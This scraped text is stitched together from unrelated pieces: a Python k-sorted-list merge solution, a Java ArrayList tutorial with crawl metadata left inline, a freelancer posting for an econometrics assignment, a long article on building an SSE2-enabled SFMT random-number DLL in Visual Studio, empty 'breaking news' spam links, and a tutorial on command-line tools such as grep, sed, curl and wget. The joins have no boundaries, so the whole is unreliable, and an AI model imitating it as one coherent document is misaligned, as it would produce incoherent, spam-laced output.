Solution
Merge k Sorted Lists
Use a min heap of size k to merge: O(N log k)
- Maintain a min heap of size k and add the heads of each list to the heap.
- Now pop the heap and add to result. Then add to heap the next node for the popped element.
from heapq import heappush, heappop

class Solution(object):
    def add_to_heap(self, i, heap, lists):
        if lists[i]:
            temp, lists[i].next = lists[i].next, None
            heappush(heap, (lists[i].val, (i, lists[i])))
            lists[i] = temp
        return

    def mergeKLists(self, lists):
        """
        :type lists: List[ListNode]
        :rtype: ListNode
        """
        N, heap, result = len(lists), [], ListNode(-1)
        curr = result
        for i in range(N):
            self.add_to_heap(i, heap, lists)
        while len(heap):
            x, (i, lnode) = heappop(heap)
            curr.next, curr = lnode, lnode  # Statement makes sure old values are assigned.
            self.add_to_heap(i, heap, lists)
        return result.next
How to create one ArrayList of ArrayList in Java :
In this quick Java programming tutorial, I will show you how to create one ArrayList of ArrayList, i.e. an ArrayList with ArrayList elements. The program will take all inputs from the user. It will take the ArrayList inputs and then print out the result.
Java program to create ArrayList of ArrayList :
import java.util.ArrayList;
import java.util.Scanner;

public class Example {
    public static void main(String[] args) {
        //1
        ArrayList<ArrayList> myList = new ArrayList<>();
        //2
        int arrayListCount, itemCount;
        Scanner scanner = new Scanner(System.in);
        //3
        System.out.println("Enter total number of ArrayList to add : ");
        arrayListCount = scanner.nextInt();
        //4
        System.out.println("Enter total values for each ArrayList : ");
        itemCount = scanner.nextInt();
        //5
        for (int i = 0; i < arrayListCount; i++) {
            //6
            System.out.println("Enter all values for ArrayList " + (i + 1) + " : ");
            ArrayList list = new ArrayList<>();
            //7
            for (int j = 0; j < itemCount; j++) {
                //8
                System.out.println("Enter value " + (j + 1) + " : ");
                list.add(scanner.next());
            }
            //9
            myList.add(list);
        }
        //10
        System.out.println(myList);
    }
}

- Create one ArrayList myList that can hold ArrayList elements.
- Create two int variables, arrayListCount and itemCount, to hold the number of ArrayList to add and the number of values for each ArrayList. We can also have ArrayList with different size. Create one Scanner variable scanner to read the user inputs.
- Ask the user to enter the total number of ArrayList to add. Read the value and store it in arrayListCount.
- Ask the user to enter the total elements for each ArrayList. Read it and store it in itemCount.
- Run one for loop to get inputs of all ArrayList.
- Ask the user to enter all values for the current ArrayList. Create one ArrayList variable list.
- Run one for-loop for itemCount time to get all values for the current ArrayList.
- Ask the user to enter the current value for the ArrayList. Read it and add it to the ArrayList.
- Add the ArrayList to the ArrayList of ArrayList.
- Finally, print out the ArrayList of ArrayList.
Sample Output :
Enter total number of ArrayList to add : 3
Enter total item numbers for each ArrayList : 2
Enter values for ArrayList 1 :
Enter item 1 : a
Enter item 2 : b
Enter values for ArrayList 2 :
Enter item 1 : c
Enter item 2 : d
Enter values for ArrayList 3 :
Enter item 1 : e
Enter item 2 : f
[[a, b], [c, d], [e, f]]
You can also download the above example from here.
Similar tutorials :
- Java program to remove element from an ArrayList of a specific index
- Java program to move all zeros of an integer array to the start
- Java program to merge values of two integer arrays
- Java Program to convert an ArrayList to an Array
- How to remove elements of Java ArrayList using removeIf() method
- Java arraylist set method example | https://www.codevscolor.com/java-create-arraylist-of-arraylist | CC-MAIN-2020-50 | refinedweb | 438 | 58.99 |
Technical Writing-----------GRETL/SPSS/MATLAB/EVIEWS/MINITAB
Budget $30-250 USD
The Assignment
You will be allocated a country to analyse.
(a) Create a log return series from the stock price index (the log return is the change in the logarithm of the stock price). Estimate an appropriate pure AR(p) model and an appropriate pure MA(q) model and compare these to a mixed ARMA(1,1) model. Carefully explain how your models were selected.
(40%)
(b) Using your preferred model from (a), test for the presence of any ARCH
effects in the residuals and estimate an appropriate GARCH model. (30%)
(c) By selecting an appropriate model in the GARCH family, test for whether there is any evidence of:
(i) a link between risk (conditional volatility) and the log return (15%)
(ii) an asymmetric response to positive and negative volatility shocks. (15%)
2000 words
4 freelancers are bidding on average $186 for this job
Hello I am Julia. Please check PM | https://www.fr.freelancer.com/projects/technical-writing-academic-writing/technical-writing-gretl-spss-matlab/ | CC-MAIN-2018-30 | refinedweb | 164 | 51.89 |
As you know, lots of software developers need random numbers while developing applications. Financial and estimation-based applications, especially, are common users of random numbers. Today, there are many random number generators, and some of them are open source and free to use. Both MT (Mersenne Twister) and its improved version SFMT (SIMD-oriented Fast Mersenne Twister) are very popular and well-known random number generator algorithms.
The first part of the “SFMT in Action” series is about generating a SIMD-oriented Fast Mersenne Twister DLL. This DLL will be able to use the CPU’s capabilities, such as SSE2.
SSE2, Streaming SIMD Extensions 2, is one of the IA-32 SIMD (Single Instruction, Multiple Data) instruction sets. SSE2 was first introduced by Intel with the initial version of the Pentium 4 in 2001. It extends the earlier SSE instruction set, and is intended to fully supplant MMX. Intel extended SSE2 to create SSE3, in 2004. SSE2 added 144 new instructions to SSE, which has 70 instructions. Rival chip-maker AMD added support for SSE2 with the introduction of their Opteron and Athlon 64 ranges of AMD64 64-bit CPUs, in 2003.
When applications are designed to take advantages of SSE2 and run on machines that support SSE2, they're almost always faster than before. Today, many CPUs support the SSE2 instruction set. For detailed information about SSE2, please visit this link.
Before starting to generate the SFMT DLL, let’s talk about it.
SIMD-oriented Fast Mersenne Twister (SFMT) is a Linear Feedbacked Shift Register (LFSR) generator that generates a 128-bit pseudorandom integer at one step. It was introduced by Mutsuo Saito and Makoto Matsumoto (from Hiroshima University) in 2006. SFMT is designed for the parallelism of modern CPUs, such as multi-stage pipelining and SIMD (e.g., 128-bit integer) instructions. It supports 32-bit and 64-bit integers, as well as double precision floating point, as output. SFMT is a variant of Mersenne Twister (MT), and is roughly twice as fast. So, it’s nice to know that the SFMT DLL will be able to generate both 32-bit and 64-bit integers.
You can find SFMT’s official site here.
A detailed explanation of the academic concept of the SFMT structure can be found here.
As I said, in this article I'll try to generate an SFMT DLL, and when I do this, I'll use the original version of the SFMT code. Its original C implementation (version 1.3.3) can be downloaded from here. During development, some necessary changes to the original C implementation, and the reasons for modifying the original code, will be explained step by step. The base concept when generating SFMT.dll is not to change or modify its core code, but to make that code callable and usable from outside of the generated DLL.
Note that I'll use Visual Studio 2008 on Windows Vista; both for analyzing the original code and developing the SFMT DLL.
In Visual Studio, I start a new C++ Win32 project named SFMT:
Now, the Win32 Application Wizard will be shown. In this window, from Application Settings, I choose “DLL” for Application type, and tick “Empty project” for Additional options.
After clicking the Finish button, a new empty project will be created on the Visual Studio screen.
I unzipped the original C implementation code of SFMT which I downloaded from this address under the Visual Studio 2008\Projects\SFMT directory. After unzipping, you see lots of files, but be sure we won't use all of them. Some of them are for test purposes, and some of the files include test results.
Actually, there are five main code files in the C implementation (version 1.3.3) that I focused on, and they are:
- SFMT.c
- SFMT.h
- SFMT-params.h
- SFMT-paramsXXXXXX.h (e.g., SFMT-params19937.h)
- SFMT-sse2.h
#elif MEXP == 19937
#include "SFMT-params19937.h"
In the code, you'll see a definition called MEXP, and it’s the starting point for using the algorithm. MEXP means Mersenne Exponent. The period of the generated sequence will be 2^MEXP - 1. It’s a mandatory definition for using the algorithm, and it must be one of these values: 607, 1279, 2281, 4253, 11213, 19937, 44497, 86243, 132049, 216091.
If you haven't specified it, the default value is 19937.
If you examine the original implementation of SFMT, you see that it can be compiled for three possible platforms:

1. Standard C without SIMD instructions
2. CPUs with SSE2 instructions
3. CPUs with AltiVec instructions (PowerPC)
Above, as you see, number 3 isn't applicable for Microsoft based platforms, because it uses AltiVec instructions. Number 2 (using the power of SSE2 instructions) is the way to go for me. While generating the DLL, my target is to modify the code to be compiled with the SSE2 instructions. Therefore, first of all, I'll clean some unnecessary parts of the code. Also, at the end of the development, when you build and compile the SFMT.dll, you'll be able to switch easily between the standard C and SSE2-supported versions.
In the Solution Explorer, under the SFMT project, I added the existing SFMT.c file to the Source Files directory and opened it to modify.
At the beginning, I detached some preprocessor codes in the SFMT.c file. For example, it includes some definitions and meanings like this:
- HAVE_SSE2 : use the SSE2 instruction set
- HAVE_ALTIVEC : use AltiVec instructions (PowerPC)
- BIG_ENDIAN64 : 64-bit output on a big-endian machine
- ONLY64 : use the generator only for 64-bit output
The HAVE_ALTIVEC, BIG_ENDIAN64, or ONLY64 preprocessor commands and their related code aren't applicable or suitable for Windows platforms, and I removed these commands and their related code from the SFMT.c file carefully.
On the other hand, there’s a preprocessor definition called HAVE_SSE2, and it’s a critical one for us. It’s important to keep HAVE_SSE2 and its related code in the file when removing other unnecessary definitions.
| Output type | Required | Optional |
|---|---|---|
| 32-bit output | MEXP | HAVE_SSE2, HAVE_ALTIVEC |
| LITTLE ENDIAN 64-bit output | MEXP | HAVE_SSE2, HAVE_ALTIVEC |
| BIG ENDIAN 64-bit output | MEXP, BIG_ENDIAN64 | HAVE_ALTIVEC, ONLY64 |
In SFMT.c file, there are two functions that are used for filling arrays with 32 bit or 64 bit random integer numbers. First is fill_array32 and second is fill_array64. I changed some part of these functions and want to mention these changes here:
The size of the array must be greater than or equal to (MEXP / 128 + 1) * 4 for fill_array32, and greater than or equal to (MEXP / 128 + 1) * 2 for fill_array64.
Because of these rules, I had to use extended size arrays when generating pseudo random numbers. Also, it's very important and much flexible to have the ability using all the sizes for array. To fulfill the arrays, I coded new functions and added them to SFMT.c code file. These functions are listed below:
/**
* This function is used to determine extended size of specified array[]
* in the fill_array32 function.
* Because, array size must be greater than or equal to (MEXP / 128 + 1) * 4
* so, let's fulfill the array if the size smaller than (MEXP / 128 + 1) * 4
* Because, array size must be a multiple of 4.
* so, let's fulfill the array.
*/
int get_array32_extended_size(int size) {
    int extended_size = 0;
    int remainder = 0;
    if (size < get_min_array_size32())
        extended_size = get_min_array_size32();
    else
        extended_size = size;
    remainder = extended_size % 4;
    if (remainder != 0)
        extended_size = extended_size + 4 - remainder;
    return extended_size;
}
/**
* This function is used to determine extended size of specified array[]
* in the fill_array64 function.
* Because, array size must be greater than or equal to (MEXP / 128 + 1) * 2
* so, let's fulfill the array if the size smaller than (MEXP / 128 + 1) * 2
* Because, array size must be a multiple of 2.
* so, let's fulfill the array.
*/
int get_array64_extended_size(int size) {
    int extended_size = 0;
    int remainder = 0;
    if (size < get_min_array_size64())
        extended_size = get_min_array_size64();
    else
        extended_size = size;
    remainder = extended_size % 2;
    if (remainder != 0)
        extended_size = extended_size + 2 - remainder;
    return extended_size;
}
As I mentioned in the previous paragraph, these modifications are very important. Via these modifications, we eliminated both the rule that the array size must be a multiple of 4 (or 2) and the rule that the array size must be greater than or equal to (MEXP / 128 + 1) * 4 (or (MEXP / 128 + 1) * 2). To be more clear: if you want to generate exactly 2113 integers, you can do it easily by using the modified fill_array32 or fill_array64 functions. With the original versions of fill_array32 and fill_array64, you can't, because 2113 is neither a multiple of 4 nor a multiple of 2.
Note: The bodies of the modified fill_array32 and fill_array64 functions, integrated with the get_array32_extended_size and get_array64_extended_size functions, are given below.
In MSVC CRT, a dynamic array can be allocated using _aligned_malloc() function, and deallocated using _aligned_free(). Below, the code for aligned memory allocation that is used in the fill_array32 and fill_array64 is given.
_aligned_malloc()
_aligned_free()
w128_t *ptr;
#if defined(HAVE_SSE2)
    ptr = (w128_t *) _aligned_malloc(sizeof(uint32_t) * extended_size, 16);
#else
    ptr = (w128_t *) _aligned_malloc(sizeof(uint32_t) * extended_size,
                                     __alignof(uint32_t));
#endif
The modified fill_array32 and fill_array64 functions are listed below:
int fill_array32(uint32_t *array, int size) {
    w128_t *ptr;
    int extended_size = get_array32_extended_size(size);
#if defined(HAVE_SSE2)
    ptr = (w128_t *) _aligned_malloc(sizeof(uint32_t) * extended_size, 16);
#else
    ptr = (w128_t *) _aligned_malloc(sizeof(uint32_t) * extended_size,
                                     __alignof(uint32_t));
#endif
    if (ptr == NULL)
        return 0;
    else {
        gen_rand_array(ptr, extended_size / 4);
        memcpy((w128_t *)array, ptr, sizeof(uint32_t) * size);
        idx = N32;
        _aligned_free(ptr);
    }
    return 1;
}
int fill_array64(uint64_t *array, int size) {
    w128_t *ptr;
    int extended_size = get_array64_extended_size(size);
#if defined(HAVE_SSE2)
    ptr = (w128_t *) _aligned_malloc(sizeof(uint64_t) * extended_size, 16);
#else
    ptr = (w128_t *) _aligned_malloc(sizeof(uint64_t) * extended_size,
                                     __alignof(uint64_t));
#endif
    if (ptr == NULL)
        return 0;
    else {
        gen_rand_array(ptr, extended_size / 2);
        memcpy((w128_t *)array, ptr, sizeof(uint64_t) * size);
        idx = N32;
        _aligned_free(ptr);
    }
    return 1;
}
In this file, I removed only the #ifdef __GNUC__ preprocessor definition and its related code. Because I am using the Microsoft Visual Studio C++ compiler for generating a DLL, I don't need GNU based codes.
You can see some basic definitions in this file. Their structure and meanings are like this:
/*-----------------
BASIC DEFINITIONS
-----------------*/
/** Mersenne Exponent. The period of the sequence
* is a multiple of 2^MEXP-1.
* #define MEXP 19937 */
/** SFMT generator has an internal state array of 128-bit integers,
* and N is its size. */
#define N (MEXP / 128 + 1)
/** N32 is the size of internal state array when regarded as an array
* of 32-bit integers.*/
#define N32 (N * 4)
/** N64 is the size of internal state array when regarded as an array
* of 64-bit integers.*/
#define N64 (N * 2)
Also, some Mersenne Exponent dependent #include preprocessor commands were included. The code structure is listed below:
#if MEXP == 607
#include "SFMT-params607.h"
#elif MEXP == 1279
#include "SFMT-params1279.h"
#elif MEXP == 2281
#include "SFMT-params2281.h"
#elif MEXP == 4253
#include "SFMT-params4253.h"
#elif MEXP == 11213
#include "SFMT-params11213.h"
#elif MEXP == 19937
#include "SFMT-params19937.h"
#elif MEXP == 44497
#include "SFMT-params44497.h"
#elif MEXP == 86243
#include "SFMT-params86243.h"
#elif MEXP == 132049
#include "SFMT-params132049.h"
#elif MEXP == 216091
#include "SFMT-params216091.h"
#else
#endif
The MEXP value is used as a criteria for determining and including correct parameter files to the project, and via this mechanism, developers can use their necessary parameter files by just changing the value of MEXP. Because of this mechanism, the original SFMT implementation covers ten different SFMT-paramsXXXXXX.h header files.
In my project, I used 19937 for MEXP. Also, 19937 is the default value for the original C implementation too.
After modifying the SFMT-params.h file, it’s time to make changes in the associated SFMT-paramsXXXXXX.h files. There are ten files and, each has its own descriptions. The MEXP constant can take ten different values and so, there are ten different paramsXXXXXX.h files at present. I use 19937 for MEXP and the first file to be changed is SFMT-params19937.h.
In the SFMT-params19937.h header file, there are some parameters for Altivec. They start with a #if defined (__APPLE__) structure in the code. I removed this preprocessor code block. This block contains parameters for the MAC OS X and is listed below:
/* PARAMETERS FOR ALTIVEC */
#if defined(__APPLE__) /* For OSX */
#define ALTI_SL1 (vector unsigned int)(SL1, SL1, SL1, SL1)
#define ALTI_SR1 (vector unsigned int)(SR1, SR1, SR1, SR1)
#define ALTI_MSK (vector unsigned int)(MSK1, MSK2, MSK3, MSK4)
#define ALTI_MSK64 \
(vector unsigned int)(MSK2, MSK1, MSK4, MSK3)
#define ALTI_SL2_PERM \
(vector unsigned char)(1,2,3,23,5,6,7,0,9,10,11,4,13,14,15,8)
#define ALTI_SL2_PERM64 \
(vector unsigned char)(1,2,3,4,5,6,7,31,9,10,11,12,13,14,15,0)
#define ALTI_SR2_PERM \
(vector unsigned char)(7,0,1,2,11,4,5,6,15,8,9,10,17,12,13,14)
#define ALTI_SR2_PERM64 \
(vector unsigned char)(15,0,1,2,3,4,5,6,17,8,9,10,11,12,13,14)
#else /* For OTHER OSs(Linux?) */
#define ALTI_SL1 {SL1, SL1, SL1, SL1}
#define ALTI_SR1 {SR1, SR1, SR1, SR1}
#define ALTI_MSK {MSK1, MSK2, MSK3, MSK4}
#define ALTI_MSK64 {MSK2, MSK1, MSK4, MSK3}
#define ALTI_SL2_PERM {1,2,3,23,5,6,7,0,9,10,11,4,13,14,15,8}
#define ALTI_SL2_PERM64 {1,2,3,4,5,6,7,31,9,10,11,12,13,14,15,0}
#define ALTI_SR2_PERM {7,0,1,2,11,4,5,6,15,8,9,10,17,12,13,14}
#define ALTI_SR2_PERM64 {15,0,1,2,3,4,5,6,17,8,9,10,11,12,13,14}
#endif /* For OSX */
Other SFMT-paramsXXXXXX header files are: SFMT-params607.h, SFMT-params1279.h, SFMT-params2281.h, SFMT-params4253.h, SFMT-params11213.h, SFMT-params44497.h, SFMT-params86243.h, SFMT-params132049.h, and SFMT-params216091.h.
I changed and modified all these parameter files. In other words, I clean out all the unnecessary OS X specific code in the header files.
Below, you can see other necessary parameters that are defined in the SFMT-params19937.h file:
#define POS1 122 // the pick up position of the array.
#define SL1 18 // the parameter of shift left as four 32-bit registers.
#define SL2 1 // the parameter of shift left as one 128-bit register.
#define SR1 11 // the parameter of shift right as four 32-bit registers.
#define SR2 1 // the parameter of shift right as one 128-bit register.
/* A bitmask, used in the recursion. These parameters are introduced
to break symmetry of SIMD. */
#define MSK1 0xdfffffefU
#define MSK2 0xddfecb7fU
#define MSK3 0xbffaffffU
#define MSK4 0xbffffff6U
// These definitions are part of a 128-bit period certification vector.
#define PARITY1 0x00000001U
#define PARITY2 0x00000000U
#define PARITY3 0x00000000U
#define PARITY4 0x13c9e684U
// String representation of MEXP 19937 parameters.
#define IDSTR "SFMT-19937:122-18-1-11-1:dfffffef-ddfecb7f-bffaffff-bffffff6"
The SFMT.h header file is very important. I'll add this file to my project. Of course, it’s a header (*.H) file so, I add it to the Header Files directory of my project. After making some modifications on it, I'll be able to call the SFMT functions outside of my DLL. Before talking about the changes, let’s look at the SFMT.h functions, declarations, their missions:
- uint32_t gen_rand32(void) : generates and returns a 32-bit pseudorandom number.
- uint64_t gen_rand64(void) : generates and returns a 64-bit pseudorandom number.
- int fill_array32(uint32_t *array, int size) : fills the given array with 32-bit pseudorandom numbers.
- int fill_array64(uint64_t *array, int size) : fills the given array with 64-bit pseudorandom numbers.
- void init_gen_rand(uint32_t seed) : initializes the internal state array with the given 32-bit seed.
To call these SFMT functions outside of my DLL, I need to use a special keyword:
__declspec(dllexport): You can export data, functions, classes, or class member functions from a DLL using the __declspec(dllexport) keyword. __declspec(dllexport) adds the export directive to the object file, so you do not need to use a .def file.
To export SFMT functions, the __declspec(dllexport) keyword must appear to the left of the calling-convention keyword, if a keyword is specified. For example:
__declspec(dllexport) int fill_array32(uint32_t *array, int size):
__declspec(dllexport) stores function names in the DLL's export table.
To make our code more readable, I'll define a macro for __declspec(dllexport) at the beginning of the SFMT header file, and will use this macro with each function we are exporting:
#define DllExport __declspec( dllexport )
After these modifications, our SFMT functions become an exportable form. You can see them below:
DllExport uint32_t gen_rand32(void);
DllExport uint64_t gen_rand64(void);
DllExport int fill_array32(uint32_t *array, int size);
DllExport int fill_array64(uint64_t *array, int size);
DllExport void init_gen_rand(uint32_t seed);
Real versions of functions: In the SFMT.h file, you can see some real versions of functions. They're due to Isaku Wada, and are used to generate random real numbers. All of the real functions are inline functions. Inline functions cannot be compiled as part of a DLL: an inline function is compiled into the location that calls it, so it does not have a single address — the function is duplicated wherever it is called (i.e., in the main app, for example). If you want to ship it as a separate binary library (*.lib, *.dll, etc.), an exported function cannot be truly inline; it must be located in the binary file, not in your executable code. For these reasons, I removed the inline functions from the SFMT.h file and then added the rSFMT.cpp file to my project under the Source Files directory. This file includes the real versions of the functions, but not inline versions. Then, I formed them to be exported, as seen below:
//Exporting rSFMT.cpp functions:
DllExport double to_real1(uint32_t v);
DllExport double genrand_real1(void);
DllExport double to_real2(uint32_t v);
DllExport double genrand_real2(void);
DllExport double to_real3(uint32_t v);
DllExport double genrand_real3(void);
DllExport double to_res53(uint64_t v);
DllExport double to_res53_mix(uint32_t x, uint32_t y);
DllExport double genrand_res53(void) ;
DllExport double genrand_res53_mix(void);
Extern C: After these modifications, if you compile the SFMT DLL and call the exported functions, then you'll get an error message at runtime, like this:
This problem occurs because the C++ compiler decorates the function names to get function overloading. Let’s see the exact name of our functions using the powerful Windows utility dumpbin.exe. Our command is dumpbin -exports SFMT.dll. The result of this command prompt is shown below:
As you see in this command prompt, the function names aren't clear, and when we try to call them, an unhandled exception occurs always.
There isn't any standard way of decorating function names, so you have to tell the C++ compiler not to decorate them. We'll use the extern "C" construct to prevent our functions from being decorated:
At the beginning of the SFMT.h file:
#ifdef __cplusplus
extern "C" {
#endif
and at the end of the SFMT.h file:
#ifdef __cplusplus
}
#endif
Now, the code and functions we write between this extern C structure will work correctly and will be callable easily. At this time, let’s see the dumpbin -exports SFMT.dll command results:
If you look into the SFMT.c file, you'll see this code:
#if defined(HAVE_SSE2)
#include "SFMT-sse2.h"
#endif
This code means, if you include the HAVE_SSE2 definition in the command line of our project, then the project will use the SFMT-sse2.h file. Therefore, if you examine the SFMT-sse2.h file you'll realize that this file is coded for using the power of the CPU’s SSE2 special commands. Of course, using this file makes our code faster. The first and only limitation of using this file is running it only on SSE2 supported CPUs.
Using SSE2 support and how to enable this functionality is mentioned on the next caption “Setting project properties”.
In Visual Studio, under the Project menu, click “SFMT properties…”.
A new window with an “SFMT Property Pages” caption will be visible. In this window, on the left side, under the “Configuration Properties” tab, you can see some property categories (General, Debugging, C/C++ etc.) that we'll use.
First of all, on the upper side of the project properties window, click the “Configuration Manager” button, and the Configuration Manager will be displayed on the screen. In this window, set the Configuration parameter to Release. Also, set “Active solution configuration” to Release, too. Setting this parameter to Release means the compiling our project doesn't need debug data and it's ready to release.
The most important properties of our SFMT.dll project are Preprocessors.
Under the “Configuration Properties” --> C/C++ --> Preprocessor tab, there are preprocessor definitions. I'll add two definitions here: MEXP and HAVE_SSE2. MEXP has been mentioned before, and it represents the Mersenne Exponent. In addition, the HAVE_SSE2 definition is used for taking advantage of CPU’s SSE2 support.
I want to say that changing the MEXP value or eliminating SSE2 support is very flexible in this situation. You can always configure these two preprocessor definitions and then compile another version of the SFMT.dll easily.
Another important property is "Optimization". Under Configuration Properties --> C/C++ --> Optimization, please be sure Optimization is set to “Maximize Speed (/O2)”. Setting this property to Maximize Speed (/O2) means the compiler will optimize the output when we compile the project. This can increase the size of the SFMT.dll, but that can be disregarded, because the speed of SFMT.dll is preferred over a smaller size. It’s not necessary to have faster code when we're generating two or three random numbers, but when generating 10 million numbers, the speed of our code becomes a major factor. In time-critical applications, like mathematical operations or engineering applications, fast code is more appropriate.
Also, we have to know about another option, called “Enable Intrinsic Functions (/Oi)”. Programs that use intrinsic functions are faster because they do not have the overhead of function calls, but may be larger because of the additional code created.
In Configuration Properties --> C/C++ --> Code Generation tab, the default value of the Runtime Library option is Multi-threaded DLL (/MD). I'll change this option to Multi-threaded (/MT). This causes your application to use the multithreaded, static version of the run-time library. It defines _MT, and causes the compiler to place the library name LIBCMT.lib into the .obj file so that the linker will use LIBCMT.lib to resolve external symbols.
C/C++ multi-threaded applications on Windows need to be compiled with either the -MT or -MD options. The -MT option will link using the static library LIBCMT.LIB, and -MD will link using the dynamic library MSVCRT.LIB. The binary linked with -MD will be smaller but dependent on MSVCRT.DLL, while the binary linked with -MT will be larger but will be self-contained with respect to the runtime. The actual working code is contained in MSVCR90.DLL (for Visual Studio 2008 projects), which must be available at runtime to applications linked with MSVCRT.lib.
If I build my project with the –MD option (dynamic linking), then my SFMT.dll will be approximately 10 KB. It’s a quite small one. If I build the project with the –MT option (static linking), then my SFMT.dll will be 57 KB. Of course, it’s larger than 10 KB.
On the other hand, If I try to call and use the dynamically linked SFMT.dll on the other computer, possibly, I can get an error like this:
"This application has failed to start because the application configuration is incorrect. Reinstalling the application may fix this problem"
This error shows that the computer and the Operating System which you are trying to run the SFMT.dll on don't have the C/C++ Runtime Libraries. In this situation, you must distribute The C/C++ Runtime Libraries with your SFMT.dll. You can see the analysis of the SFMT.dll running on an Operating System without the C/C++ Runtime Libraries below. As you can see, it needs the MSVCR90.dll and related libraries. Also note that, it’s quite simple to setup the SFMT Project with the necessary C/C++ Runtime Libraries. Because, we're using a powerful IDE: Visual Studio 2008.
In addition, in the Configuration Properties --> C/C++ --> Code Generation tab, set the Enable Enhanced Instruction Set property to Streaming SIMD Extensions 2 (/arch:SSE2). The arch flag enables the use of instructions found on processors that support enhanced instruction sets, e.g., the SSE and SSE2 extensions of Intel 32-bit processors. Note that, with this setting, it will prevent the code running on processors which don't support SSE2 extensions. But, in this project, our processor target is CPUs supporting SSE instructions.
After setting these properties under C/C++ tab, our Command Line is:
/O2 /Oi /GL /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_USRDLL"
/D "SFMT_EXPORTS" /D "MEXP=19937" /D "HAVE_SSE2" /D "_WINDLL" /D
"_UNICODE" /D "UNICODE" /FD /EHsc /MT /Gy /arch:SSE2
/Fo"Release\\" /Fd"Release\vc90.pdb" /W3 /nologo /c /Zi /TP /errorReport:prompt
On the other tab called “Linker”, it’s important to see the Target Machine property set to MachineX86. This is the default value for our project, but don't forget to check it. The Linker tab’s command will be like this:
/OUT:"C:\Users\emre\Documents\Visual Studio 2008\Projects\SFMT\Release\SFMT.dll"
/INCREMENTAL:NO /NOLOGO /DLL /MANIFEST
/MANIFESTFILE:"Release\SFMT.dll.intermediate.manifest"
/MANIFESTUAC:"level='asInvoker' uiAccess='false'" /DEBUG
/PDB:"C:\Users\emre\Documents\Visual Studio 2008\Projects\SFMT\Release\SFMT.pdb"
/SUBSYSTEM:WINDOWS /OPT:REF /OPT:ICF /LTCG
Now, it is time to build the SFMT project. To do this, simply press the F6 key, or focus on the Build menu of Visual Studio and then click “Build Solution”. If all is OK, then you'll get a message “Build succeeded”. After this, Visual Studio will create a folder named “Release” under the SFMT project main directory. In this folder, you'll see SFMT.dll. To analyze SFMT.dll, I use the Dependency Walker tool. You can download it from here. All exportable functions in SFMT.dll can be seen easily via this GUI. You can see a screenshot representing the SFMT.dll below.
In addition, after building my project, I renamed SFMT.dll to SFMTsse2.dll for future compatibility. Actually, I'll need this kind of criterion when determining and using the right DLL. Anyway, we'll talk about it later.
If you don't have SSE2 support on the machine that SFMT.dll will run on, then you'll get an error. Instead of getting this error, you could easily prepare a plain C version of SFMT.dll and rename it to SFMTc.dll. This SFMTc.dll could generate random numbers without needing SSE2 support. Configuring the project properties for SFMTc.dll is easy: remove the HAVE_SSE2 preprocessor definition, set the Enable Enhanced Instruction Set property back to Not Set, and rebuild.
That's it. You can use your SFMTc.dll on the machines that don't have SSE2 support.
New articles of the “SFMT in Action” series are coming soon.
See you later.
This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)
<a href=""><strong> breaking news india</strong></a>
<a href=""><strong> breaking news today</strong></a>
General News Suggestion Question Bug Answer Joke Praise Rant Admin
Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages. | http://www.codeproject.com/Articles/31436/SFMT-in-Action-Part-I-Generating-a-DLL-Including-S?PageFlow=FixedWidth | CC-MAIN-2016-18 | refinedweb | 4,506 | 56.35 |
An Intro to Data Science at the Command Line with Pup, Go, and CLI Tools
This command line programming tutorial will teach you how to use command line tools to analyze data, including how to parse html with tools like Pup. Additionally, you will learn how to build a simple CLI (Command Line Interface) with Go.
This tutorial is based an office hours session hosted by Codementor Eric Chiang, the creator of Pup. Pup was on the top of Hacker News when it debuted.
The text below is a summary done by the Codementor team and may vary from the original video and if you see any issues, please let us know!
Nifty Command Line Tools You Should Try
Grep & nl
$Cat is a command line tool that will takes a file and spits out the content of the file.
grep will take the file and filter the content out.
The most important thing is the pipe (
|), where we can take some command, take the output of the command, and put it into something else. So in this example we take the output of
$cat, put it into
grep using the command called pipe (
|), and filter for the word “pup”. The cool thing about
grep is you can have lots of pipes and chain the command together, like this:
nl basically takes every single line and puts the line number in front of it. In this case we have the
$cat command line,
cats_n_dogs.txt file, and in the middle we have the command line
nl. We usually use this command to prepend the line number, which can be useful for huge text files where you want to search for a specific word, and now you can know the exact line number where the word is located.
Analyzing Data with the Pipe Command
Say you have a txt file containing all of Shakespeare’s work. Here are several command lines that will help you analyze the file:
\ $ cat Shakespeare.txt | \ sed -e 's/\s+/\n/g' | \ tr -d ' ' | \ grep -e '^$' -v | \ tr '[:upper:]' '[:lower:]' | \ sort | uniq -c | sort -nr | \ head -n 50
in which you can find what were the most common words Shakespeare wrote with
\ sed -e 's/\s+/\n/g' | \
sed replaces certain characters with other characters. In this case, white spaces and new lines are replaced, and every single word will be put on a new line. Then, you can trim the result with
tr –d ‘ ‘ | \. Also, notice that the
grep here
grep -e '^$' -v | \
here is used in the opposite way of what it has been used for previously. Instead of filtering only for lines containing a certain word, here it will filter for any line that doesn’t use a particular keyword. In this example, we’re looking for any lines that don’t contain anything and filtering those out.
We can then convert every upper case letter to lower case with
tr '[:upper:]' '[:lower:]', sort and count them with
sort | uniq –c, sort them again and count them by numbers with
sort –nr, and finally get the first 50 lines of the result with
head -n 50
Curl & wget
wget has a tone of commands. For instance, it can take a link, downloads all its content, and save it to some file, like how I downloaded the text file containing all of Shakespeare’s works.
$ wget -O Shakespeare.txt \
One of my favorite
wget commands is
$ wget --load-cookies cookies.txt
Where I can load cookies, which signifies me as being a unique user to a website. (Eg. Facebook and twitter uses cookies to recognize users, and when I come back to those sites again it knows who I am based on my cookies.)
wget can take these cookies and pretend to be me on a website, which is interesting because it will allow you to download in an automated, dynamic way that would not have been possible without the cookies.
The unfortunate thing about
wget is that it’s not very pipe-like, so there’s another command called
curl if you’re like me and really like using pipes.
Curl
Curl can also download files like
wget:
$ curl -o Shakespeare.txt \
Additionally, it can function like the
$cat command.
$ curl... | \ sed -e 's/\s+/\n/g' | \ tr -d ' ' | \ grep -e '^$' -v | \ tr '[:upper:]' '[:lower:]' | \ sort | uniq -c | sort -nr | \ head -n 50
Therefore, instead of catting your files, you can use
curl on a url to achieve the same results.
However it’s not easy to interact with HTML due to how irregular it is, even though it’s possible.
What makes things worse, some horribly written HTML such as
<tbody> <tr><img src="foo"></tr> <tr><img/><br> </tbody> </table>
can be considered valid, but they cannot be parsed into XML, which just complicate things. All in all, my advice is to never try to write an HTML parser.
